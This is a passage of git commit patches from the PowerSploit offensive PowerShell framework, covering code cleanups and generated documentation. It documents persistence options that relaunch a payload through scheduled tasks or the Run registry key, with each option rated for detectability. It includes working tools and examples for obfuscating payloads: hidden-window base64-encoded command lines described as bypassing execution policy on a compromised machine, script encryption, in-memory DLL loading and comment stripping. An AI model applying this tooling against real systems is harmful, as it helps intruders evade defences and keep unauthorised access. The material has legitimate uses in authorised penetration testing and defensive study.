+New-UserPersistenceOption [-ScheduledTask] [-Daily] -At +``` + +### Registry +``` +New-UserPersistenceOption [-Registry] [-AtLogon] +``` + +## DESCRIPTION +New-UserPersistenceOption allows for the configuration of elevated persistence options. +The output of this function is a required parameter of Add-Persistence. +Available persitence options in order of stealth are the following: scheduled task, registry. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$UserOptions = New-UserPersistenceOption -Registry -AtLogon +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle +``` + +## PARAMETERS + +### -ScheduledTask +Persist via a scheduled task. + +Detection Difficulty: Moderate +Removal Difficulty: Moderate +User Detectable? +No + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskHourly, ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Registry +Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. +Note: This option will briefly pop up a PowerShell console to the user. + +Detection Difficulty: Easy +Removal Difficulty: Easy +User Detectable? +Yes + +```yaml +Type: SwitchParameter +Parameter Sets: Registry +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Daily +Starts the payload daily. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Hourly +Starts the payload hourly. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskHourly +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -At +Starts the payload at the specified time. +You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. + +```yaml +Type: DateTime +Parameter Sets: ScheduledTaskDaily +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OnIdle +Starts the payload after one minute of idling. + +```yaml +Type: SwitchParameter +Parameter Sets: ScheduledTaskOnIdle +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AtLogon +Starts the payload upon any user logon. + +```yaml +Type: SwitchParameter +Parameter Sets: Registry +Aliases: + +Required: True +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/index.md b/docs/index.md index 8cd53ea..ac37071 100644 --- a/docs/index.md +++ b/docs/index.md @@ -25,7 +25,7 @@ Add persistence capabilities to a PowerShell script. New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function. Add-Persistence - Add persistence capabilities to a script. Install-SSP - Installs a security support provider (SSP) dll. - Get-SecurityPackages - Enumerates all loaded security packages (SSPs). + Get-SecurityPackage - Enumerates all loaded security packages (SSPs). ### AntivirusBypass AV doesn't stand a chance against PowerShell! diff --git a/mkdocs.yml b/mkdocs.yml index 8012ab0..a0838fd 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -132,3 +132,10 @@ pages: - Functions: - Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md' - Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md' +- Persistence: + - Functions: + - New-ElevatedPersistenceOption: 'Persistence/New-ElevatedPersistenceOption.md' + - New-UserPersistenceOption: 'Persistence/New-UserPersistenceOption.md' + - Add-Persistence: 'Persistence/Add-Persistence.md' + - Install-SSP: 'Persistence/Install-SSP.md' + - Get-SecurityPackage: 'Persistence/Get-SecurityPackage.md' -- cgit v1.2.3 From 59e6f94e763d40614284d43823a391cafd384c4c Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Wed, 14 Dec 2016 18:50:58 -0500 Subject: For ./ScriptModification/ : -PSScriptAnalyzering -Tweaking of synopsis blocks in order to support platyPS -Code standardization -Generated docs --- README.md | 2 +- ScriptModification/Out-CompressedDll.ps1 | 20 +-- ScriptModification/Out-EncodedCommand.ps1 | 19 +-- ScriptModification/Out-EncryptedScript.ps1 | 42 +++--- ScriptModification/Remove-Comment.ps1 | 158 +++++++++++++++++++++ ScriptModification/Remove-Comments.ps1 | 156 --------------------- ScriptModification/ScriptModification.psd1 | 2 +- docs/ScriptModification/Out-CompressedDll.md | 60 ++++++++ docs/ScriptModification/Out-EncodedCommand.md | 186 +++++++++++++++++++++++++ docs/ScriptModification/Out-EncryptedScript.md | 148 ++++++++++++++++++++ docs/ScriptModification/Remove-Comment.md | 110 +++++++++++++++ docs/index.md | 2 +- mkdocs.yml | 6 + 13 files changed, 716 insertions(+), 195 deletions(-) create mode 100644 ScriptModification/Remove-Comment.ps1 delete mode 100644 ScriptModification/Remove-Comments.ps1 create mode 100755 docs/ScriptModification/Out-CompressedDll.md create mode 100755 docs/ScriptModification/Out-EncodedCommand.md create mode 100755 docs/ScriptModification/Out-EncryptedScript.md create mode 100755 docs/ScriptModification/Remove-Comment.md (limited to 'docs/index.md') diff --git a/README.md b/README.md index 60ac90f..5ec6892 100644 --- a/README.md +++ b/README.md @@ -36,7 +36,7 @@ Compresses, Base-64 encodes, and outputs generated code to load a managed dll in Encrypts text files/scripts. -#### `Remove-Comments` +#### `Remove-Comment` Strips comments and extra whitespace from a script. diff --git a/ScriptModification/Out-CompressedDll.ps1 b/ScriptModification/Out-CompressedDll.ps1 index 5e6897d..8608956 100644 --- a/ScriptModification/Out-CompressedDll.ps1 +++ b/ScriptModification/Out-CompressedDll.ps1 @@ -5,12 +5,12 @@ function Out-CompressedDll Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. -PowerSploit Function: Out-CompressedDll -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - +PowerSploit Function: Out-CompressedDll +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. @@ -21,7 +21,7 @@ Specifies the path to a managed executable. .EXAMPLE -C:\PS> Out-CompressedDll -FilePath evil.dll +Out-CompressedDll -FilePath evil.dll Description ----------- @@ -36,7 +36,9 @@ Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param ( [Parameter(Mandatory = $True)] [String] $FilePath @@ -51,7 +53,7 @@ http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html $FileBytes = [System.IO.File]::ReadAllBytes($Path) - if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ') + if (($FileBytes[0..1] | ForEach-Object {[Char]$_}) -join '' -cne 'MZ') { Throw "$Path is not a valid executable." } diff --git a/ScriptModification/Out-EncodedCommand.ps1 b/ScriptModification/Out-EncodedCommand.ps1 index 04e8c12..6f21391 100644 --- a/ScriptModification/Out-EncodedCommand.ps1 +++ b/ScriptModification/Out-EncodedCommand.ps1 @@ -5,12 +5,12 @@ function Out-EncodedCommand Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. -PowerSploit Function: Out-EncodedCommand -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - +PowerSploit Function: Out-EncodedCommand +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies. @@ -49,13 +49,13 @@ Base-64 encodes the entirety of the output. This is usually unnecessary and effe .EXAMPLE -C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'} +Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'} powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() .EXAMPLE -C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput +Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA= @@ -72,7 +72,8 @@ This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kenn http://www.exploit-monday.com #> - [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( + [CmdletBinding( DefaultParameterSetName = 'FilePath')] + Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )] [ValidateNotNullOrEmpty()] [ScriptBlock] diff --git a/ScriptModification/Out-EncryptedScript.ps1 b/ScriptModification/Out-EncryptedScript.ps1 index eba48f7..c24b126 100644 --- a/ScriptModification/Out-EncryptedScript.ps1 +++ b/ScriptModification/Out-EncryptedScript.ps1 @@ -5,11 +5,11 @@ function Out-EncryptedScript Encrypts text files/scripts. -PowerSploit Function: Out-EncryptedScript -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Out-EncryptedScript +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -36,7 +36,8 @@ is randomly generated by default. .EXAMPLE -C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty +$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Out-EncryptedScript .\Naughty-Script.ps1 $Password salty Description ----------- @@ -48,10 +49,10 @@ function 'de' and the base64-encoded ciphertext. .EXAMPLE -C:\PS> [String] $cmd = Get-Content .\evil.ps1 -C:\PS> Invoke-Expression $cmd -C:\PS> $decrypted = de password salt -C:\PS> Invoke-Expression $decrypted +[String] $cmd = Get-Content .\evil.ps1 +Invoke-Expression $cmd +$decrypted = de password salt +Invoke-Expression $decrypted Description ----------- @@ -64,34 +65,39 @@ unencrypted script is called via Invoke-Expression This command can be used to encrypt any text-based file/script #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $ScriptPath, - + [Parameter(Position = 1, Mandatory = $True)] - [String] + [Security.SecureString] $Password, - + [Parameter(Position = 2, Mandatory = $True)] [String] $Salt, - + [Parameter(Position = 3)] [ValidateLength(16, 16)] [String] - $InitializationVector = ((1..16 | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''), - + $InitializationVector = ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''), + [Parameter(Position = 4)] [String] $FilePath = '.\evil.ps1' ) + $TempCred = New-Object System.Management.Automation.PSCredential('a', $Password) + $PlaintextPassword = $TempCred.GetNetworkCredential().Password + $AsciiEncoder = New-Object System.Text.ASCIIEncoding $ivBytes = $AsciiEncoder.GetBytes($InitializationVector) # While this can be used to encrypt any file, it's primarily designed to encrypt itself. [Byte[]] $scriptBytes = Get-Content -Encoding Byte -ReadCount 0 -Path $ScriptPath - $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2) + $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($PlaintextPassword, $AsciiEncoder.GetBytes($Salt), "SHA1", 2) $Key = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC [Byte[]] $KeyBytes = $DerivedPass.GetBytes(16) diff --git a/ScriptModification/Remove-Comment.ps1 b/ScriptModification/Remove-Comment.ps1 new file mode 100644 index 0000000..6194419 --- /dev/null +++ b/ScriptModification/Remove-Comment.ps1 @@ -0,0 +1,158 @@ +function Remove-Comment +{ +<# +.SYNOPSIS + +Strips comments and extra whitespace from a script. + +PowerSploit Function: Remove-Comment +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Remove-Comment strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big. + +A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee! + +.PARAMETER ScriptBlock + +Specifies a scriptblock containing your script. + +.PARAMETER Path + +Specifies the path to your script. + +.EXAMPLE + +$Stripped = Remove-Comment -Path .\ScriptWithComments.ps1 + +.EXAMPLE + +Remove-Comment -ScriptBlock { +### This is my awesome script. My documentation is beyond reproach! + Write-Host 'Hello, World!' ### Write 'Hello, World' to the host +### End script awesomeness +} + +Write-Host 'Hello, World!' + +.EXAMPLE + +Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand + +Description +----------- +Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand. + +.INPUTS + +System.String, System.Management.Automation.ScriptBlock + +Accepts either a string containing the path to a script or a scriptblock. + +.OUTPUTS + +System.Management.Automation.ScriptBlock + +Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired. + +.LINK + +http://www.exploit-monday.com +http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding( DefaultParameterSetName = 'FilePath' )] + Param ( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )] + [ValidateNotNullOrEmpty()] + [String] + $Path, + + [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )] + [ValidateNotNullOrEmpty()] + [ScriptBlock] + $ScriptBlock + ) + + Set-StrictMode -Version 2 + + if ($PSBoundParameters['Path']) + { + Get-ChildItem $Path -ErrorAction Stop | Out-Null + $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path)) + $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString) + } + else + { + # Convert the scriptblock to a string so that it can be referenced with array notation + $ScriptBlockString = $ScriptBlock.ToString() + } + + # Tokenize the scriptblock and return all tokens except for comments + $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' } + + $StringBuilder = New-Object Text.StringBuilder + + # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script. + $CurrentColumn = 1 + $NewlineCount = 0 + foreach($CurrentToken in $Tokens) + { + # Now output the token + if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation')) + { + $CurrentColumn = 1 + # Only insert a single newline. Sequential newlines are ignored in order to save space. + if ($NewlineCount -eq 0) + { + $StringBuilder.AppendLine() | Out-Null + } + $NewlineCount++ + } + else + { + $NewlineCount = 0 + + # Do any indenting + if($CurrentColumn -lt $CurrentToken.StartColumn) + { + # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored. + if ($CurrentColumn -ne 1) + { + $StringBuilder.Append(' ') | Out-Null + } + } + + # See where the token ends + $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1 + + # Handle the line numbering for multi-line strings + if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine)) + { + $LineCounter = $CurrentToken.StartLine + $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n') + + foreach($StringLine in $StringLines) + { + $StringBuilder.Append($StringLine) | Out-Null + $LineCounter++ + } + } + # Write out a regular token + else + { + $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null + } + + # Update our position in the column + $CurrentColumn = $CurrentToken.EndColumn + } + } + + Write-Output ([ScriptBlock]::Create($StringBuilder.ToString())) +} diff --git a/ScriptModification/Remove-Comments.ps1 b/ScriptModification/Remove-Comments.ps1 deleted file mode 100644 index 45a9746..0000000 --- a/ScriptModification/Remove-Comments.ps1 +++ /dev/null @@ -1,156 +0,0 @@ -function Remove-Comments -{ -<# -.SYNOPSIS - -Strips comments and extra whitespace from a script. - -PowerSploit Function: Remove-Comments -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big. - -A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee! - -.PARAMETER ScriptBlock - -Specifies a scriptblock containing your script. - -.PARAMETER Path - -Specifies the path to your script. - -.EXAMPLE - -C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1 - -.EXAMPLE - -C:\PS> Remove-Comments -ScriptBlock { -### This is my awesome script. My documentation is beyond reproach! - Write-Host 'Hello, World!' ### Write 'Hello, World' to the host -### End script awesomeness -} - -Write-Host 'Hello, World!' - -.EXAMPLE - -C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand - -Description ------------ -Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand. - -.INPUTS - -System.String, System.Management.Automation.ScriptBlock - -Accepts either a string containing the path to a script or a scriptblock. - -.OUTPUTS - -System.Management.Automation.ScriptBlock - -Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired. - -.LINK - -http://www.exploit-monday.com -http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/ -#> - - [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param ( - [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )] - [ValidateNotNullOrEmpty()] - [String] - $Path, - - [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )] - [ValidateNotNullOrEmpty()] - [ScriptBlock] - $ScriptBlock - ) - - Set-StrictMode -Version 2 - - if ($PSBoundParameters['Path']) - { - Get-ChildItem $Path -ErrorAction Stop | Out-Null - $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path)) - $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString) - } - else - { - # Convert the scriptblock to a string so that it can be referenced with array notation - $ScriptBlockString = $ScriptBlock.ToString() - } - - # Tokenize the scriptblock and return all tokens except for comments - $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' } - - $StringBuilder = New-Object Text.StringBuilder - - # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script. - $CurrentColumn = 1 - $NewlineCount = 0 - foreach($CurrentToken in $Tokens) - { - # Now output the token - if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation')) - { - $CurrentColumn = 1 - # Only insert a single newline. Sequential newlines are ignored in order to save space. - if ($NewlineCount -eq 0) - { - $StringBuilder.AppendLine() | Out-Null - } - $NewlineCount++ - } - else - { - $NewlineCount = 0 - - # Do any indenting - if($CurrentColumn -lt $CurrentToken.StartColumn) - { - # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored. - if ($CurrentColumn -ne 1) - { - $StringBuilder.Append(' ') | Out-Null - } - } - - # See where the token ends - $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1 - - # Handle the line numbering for multi-line strings - if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine)) - { - $LineCounter = $CurrentToken.StartLine - $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n') - - foreach($StringLine in $StringLines) - { - $StringBuilder.Append($StringLine) | Out-Null - $LineCounter++ - } - } - # Write out a regular token - else - { - $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null - } - - # Update our position in the column - $CurrentColumn = $CurrentToken.EndColumn - } - } - - Write-Output ([ScriptBlock]::Create($StringBuilder.ToString())) -} diff --git a/ScriptModification/ScriptModification.psd1 b/ScriptModification/ScriptModification.psd1 index 923c874..07cd0bf 100644 --- a/ScriptModification/ScriptModification.psd1 +++ b/ScriptModification/ScriptModification.psd1 @@ -26,6 +26,6 @@ FunctionsToExport = '*' # List of all files packaged with this module FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', - 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md' + 'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md' } diff --git a/docs/ScriptModification/Out-CompressedDll.md b/docs/ScriptModification/Out-CompressedDll.md new file mode 100755 index 0000000..df7cff5 --- /dev/null +++ b/docs/ScriptModification/Out-CompressedDll.md @@ -0,0 +1,60 @@ +# Out-CompressedDll + +## SYNOPSIS +Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. + +PowerSploit Function: Out-CompressedDll +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Out-CompressedDll [-FilePath] +``` + +## DESCRIPTION +Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Out-CompressedDll -FilePath evil.dll +``` + +Description +----------- +Compresses, base64 encodes, and outputs the code required to load evil.dll in memory. + +## PARAMETERS + +### -FilePath +Specifies the path to a managed executable. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +Only pure MSIL-based dlls can be loaded using this technique. +Native or IJW ('it just works' - mixed-mode) dlls will not load. + +## RELATED LINKS + +[http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html) + diff --git a/docs/ScriptModification/Out-EncodedCommand.md b/docs/ScriptModification/Out-EncodedCommand.md new file mode 100755 index 0000000..6666796 --- /dev/null +++ b/docs/ScriptModification/Out-EncodedCommand.md @@ -0,0 +1,186 @@ +# Out-EncodedCommand + +## SYNOPSIS +Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. + +PowerSploit Function: Out-EncodedCommand +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### FilePath (Default) +``` +Out-EncodedCommand [[-Path] ] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64] [-WindowStyle ] + [-EncodedOutput] +``` + +### ScriptBlock +``` +Out-EncodedCommand [[-ScriptBlock] ] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64] + [-WindowStyle ] [-EncodedOutput] +``` + +## DESCRIPTION +Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. +The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. +This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'} +``` + +powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream(\[IO.MemoryStream\]\[Convert\]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),\[IO.Compression.CompressionMode\]::Decompress)),\[Text.Encoding\]::ASCII)).ReadToEnd() + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput +``` + +powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA= + +Description +----------- +Execute the above payload for the lulz. +\>D + +## PARAMETERS + +### -ScriptBlock +Specifies a scriptblock containing your payload. + +```yaml +Type: ScriptBlock +Parameter Sets: ScriptBlock +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the path to your payload. + +```yaml +Type: String +Parameter Sets: FilePath +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -NoExit +Outputs the option to not exit after running startup commands. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -NoProfile +Outputs the option to not load the Windows PowerShell profile. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -NonInteractive +Outputs the option to not present an interactive prompt to the user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Wow64 +Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -WindowStyle +Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -EncodedOutput +Base-64 encodes the entirety of the output. +This is usually unnecessary and effectively doubles the size of the output. +This option is only for those who are extra paranoid. + +```yaml +Type: SwitchParameter +Parameter Sets: 